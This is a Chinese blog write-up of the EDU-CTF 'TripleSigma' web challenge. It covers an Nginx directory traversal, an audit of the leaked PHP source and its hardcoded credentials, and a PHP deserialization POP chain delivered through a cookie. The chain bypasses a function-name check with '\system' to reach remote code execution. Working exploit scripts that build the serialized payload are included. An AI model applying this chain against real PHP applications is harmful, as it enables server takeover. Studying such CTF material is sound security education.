EDU-CTF TripleSigma题解
- 2019 年 10 月 8 日
- 筆記
EDU-CTF是台大、交大、台科大三个学校的校赛,题目感觉都不错。TripleSigma这道题的反序列化POP链很有意思,官方wp写的很简单,在这里分析一下。 题目地址:http://final.kaibro.tw:10004/(需要梯zi)
信息搜集
打开是一个博客页面,注册功能被关掉了,目录也扫不出来东西。 根据报错页面可以知道后端是Nginx
众所周知Nginx会由于配置错误产生很多安全问题,可以参考p牛文章:三个案例看Nginx配置安全 比如这里就存在目录穿越漏洞,从而可以下载网站源码。
代码审计
网站的源码文件很多, lib文件夹下是各种功能的模块文件。根目录下的每个文件都包含了所有模块。首先查看注册和登陆源码,注册代码基本没用。 login.php
<?php session_start(); if(isset($_POST['user']) && isset($_POST['pass'])) { $user = $_POST['user']; $pass = $_POST['pass']; if(User::check($user, $pass)) { $_SESSION['user'] = User::getIDByName($user); $wrong = false; header("Location: index.php"); } else { $wrong = true; } } ?>
跟进 User模块 class_user.php
<?php class User { public $func = "shell_exec"; public $data = NULL; public static function getAllUser() { $users = array(array('id' => 1, 'name' => 'kaibro', 'password' => 'easypeasy666')); return $users; } public static function getNameByID($id) { $users = User::getAllUser(); for($i = 0; $i < count($users); $i++) { if($users[$i]['id'] === $id) { return $users[$i]['name']; } } return NULL; } public static function getIDByName($name) { $users = User::getAllUser(); for($i = 0; $i < count($users); $i++) { if($users[$i]['name'] === $name) { return $users[$i]['id']; } } return NULL; } public static function check($name, $password) { $users = User::getAllUser(); for($i = 0; $i < count($users); $i++) { if($users[$i]['name'] === $name && $users[$i]['password'] === $password) return true; } return false; } public function save() { if(!isset($this->data)) $this->data = User::getAllUser(); if(preg_match("/^[a-z]/is", $this->func)) { if($this->func === "shell_exec") { # ($this->func)("echo " . escapeshellarg($this->data) . " > /tmp/result"); } } else { # ($this->func)($this->data); } } public static function getFunc() { return $this->func; } }
可以看到 check方法把登陆的用户名密码与 getAllUser方法的数组进行对比,有相同的值就返回True。因此我们直接用源码中的 kaibro和 easypeasy666登陆即可。 另外在 cookie模块中发现一处任意反序列化
寻找POP Chain
在 blog.php中如果存在 $_COOKIE['e'],则会实例化cookie对象,并且可以触发任意反序列化对象的 __tostring方法
user模块的 save方法虽然对 shell_exec的参数进行了 escapeshellarg处理,且要求自定义函数名开头不能为字母,但是我们可以通过php全局命名空间 进行绕过,
进入 else条件中进行RCE。
public function save() { if(!isset($this->data)) $this->data = User::getAllUser(); if(preg_match("/^[a-z]/is", $this->func)) { if($this->func === "shell_exec") { ($this->func)("echo " . escapeshellarg($this->data) . " > /tmp/result"); } } else { ($this->func)($this->data); }
构造exp(这里我在本地测试了,因为发现题目有问题。)
<?php include("lib/class_cookie.php"); include("lib/class_user.php"); include("lib/class_debug.php"); $A = new Debug(); $A->fm = new User(); $A->fm->func = "\system"; $A->fm->data = "dir"; echo strrev(base64_encode("1|".serialize($art)));
测试失败,而官方给的exp却可以
<?php include("lib/class_article.php"); include("lib/class_articlebody.php"); include("lib/class_cookie.php"); include("lib/class_user.php"); include("lib/class_debug.php"); include("lib/class_filemanager.php"); $title = new Debug(); $title->fm = new User(); $title->fm->func = "\system"; $title->fm->data = "dir"; $content = "foo"; $body = new ArticleBody($title, $content); $art = new Article("foo", "bar"); $art->body = $body; echo strrev(base64_encode("1|".serialize($title)));
它这里把 Debug类的序列化对象传给了 ArticleBody的 $title属性,然后 ArticleBody类的序列化对象又传给了 Article对象的 $body属性。 跟第一次测试的思路一样,触发 Article对象的 __tostring方法
从而又触发了 ArticleBody对象的 __tostring方法
而它的 $title属性为 Debug,从而又触发其 __tostring方法调用我们传入的 User对象的 save()方法构成RCE。
寻找测试失败原因
想了很久才发现是printtitle()函数的问题。
一直以为他会直接打印字符串,从而触发 __tostring。哪里会想到它echo的是 $r->body->title 在libcommon.php第99行。
function print_title($r) { if(isset($r)) { echo $r->body->title; } }
那么官方的exp就是直接触发 Debug的 __toString方法了,没有那么复杂了,2333感觉好坑啊。
后记
以后读代码一定要仔细认真,不忽略任何一个点,不然要绕大弯路。
